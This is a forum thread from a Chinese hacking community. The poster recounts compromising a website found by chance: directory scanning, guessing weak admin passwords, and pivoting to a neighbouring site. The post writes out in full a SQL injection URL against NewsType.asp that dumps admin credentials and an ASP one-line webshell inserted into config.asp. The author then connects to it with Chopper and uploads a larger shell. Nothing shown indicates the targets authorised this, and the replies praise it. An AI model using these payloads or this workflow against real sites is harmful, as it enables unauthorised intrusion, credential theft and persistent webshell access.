查看: 21689|回复: 4

记一次不算成功的检测

[复制链接]
发表于 2014-5-5 13:32:14 | 显示全部楼层 |阅读模式
##########################################
#  Title    :一次不算成功的检测(08sec申请转正帖)
#  Time   : 2014年5月5日
#  Team  :  08sec team
#  Author : Vocin
#  首发   : 08安全小组
#######################################


小白文章 没任何亮点 利用的0day也是早就都知道的


=========================
利用的语句
[AppleScript] 查看源码 复制代码
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='




=========================

今天偶然发现一个站点

1.jpg
结果没有可以利用的地方,只有静态网页
好吧 先御剑扫下目录
14副本.jpg

有个后台 看看
13.jpg
试了弱口令 admin admin  ;admin888 admin888 等等 都不行
好吧 慢慢来

好像有FCK可以利用 点开看看
15.jpg
好吧 没的利用
慢慢来吧 先旁站下
找到一个网站

2.jpg
还是御剑扫下目录先
16.jpg

有个后台 看下
3.jpg
是个南方站的后台 阿弥陀佛 老衲记得南方站有个0day

试试看
4.jpg
既然如此 那就进后台看看吧
360软件小助手截图20140505132250.jpg
有数据库备份 可惜有限制
不过我看到个网站配置 而且可以修改 我顿时就邪恶了
8副本.jpg
南方后台不是可以在网站配置中插入一句话 然后菜刀连接 http://www.xxx.com/inc/config.asp
试试看
"%><%execute(request("1"))%><%'
9.jpg


菜刀连接之
10.jpg

成功连接 感谢上帝
然后就上传大马什么的拿到shell了

11.jpg
虽然拿到shell了 但是还不太会提权 也就这样了  后续的没法继续下去
纯粹小白文一篇  所以打算来08学习 增长知识 希望以后能有更大的进步

记一次不算成功的检测.docx (3.2 MB, 下载次数: 0)


                                                                -
回复

使用道具 举报

发表于 2014-5-5 16:10:20 | 显示全部楼层
图片没有显示,重新编辑一下哦

点评

已修改  详情 回复 发表于 2014-5-5 20:52
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-5-5 20:52:30 | 显示全部楼层
管理02 发表于 2014-5-5 16:10
图片没有显示,重新编辑一下哦

已修改

点评

文章质量一般,但是对于而爱学习的程度,欢迎一起学习、  详情 回复 发表于 2014-5-6 19:17
回复 支持 反对

使用道具 举报

发表于 2014-5-6 19:17:29 | 显示全部楼层

文章质量一般,但是对于而爱学习的程度,欢迎一起学习、
回复 支持 1 反对 0

使用道具 举报

发表于 2026-5-21 10:20:00 | 显示全部楼层

Re: 记一次不算成功的检测

楼主这篇过程写得很清晰,虽然自嘲是“小白文”,但每一步的思路(扫目录、测弱口令、利用已知漏洞)其实都是实用的基本功。能一步步从旁站找到可利用的南方站后台,再通过网站配置插一句话拿shell,操作很流畅。提权确实是个坎,很多人拿到shell后就卡在这步,慢慢积累经验总会突破的。感谢分享实战记录,加油!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-6-15 22:36 , Processed in 0.029370 second(s), 21 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部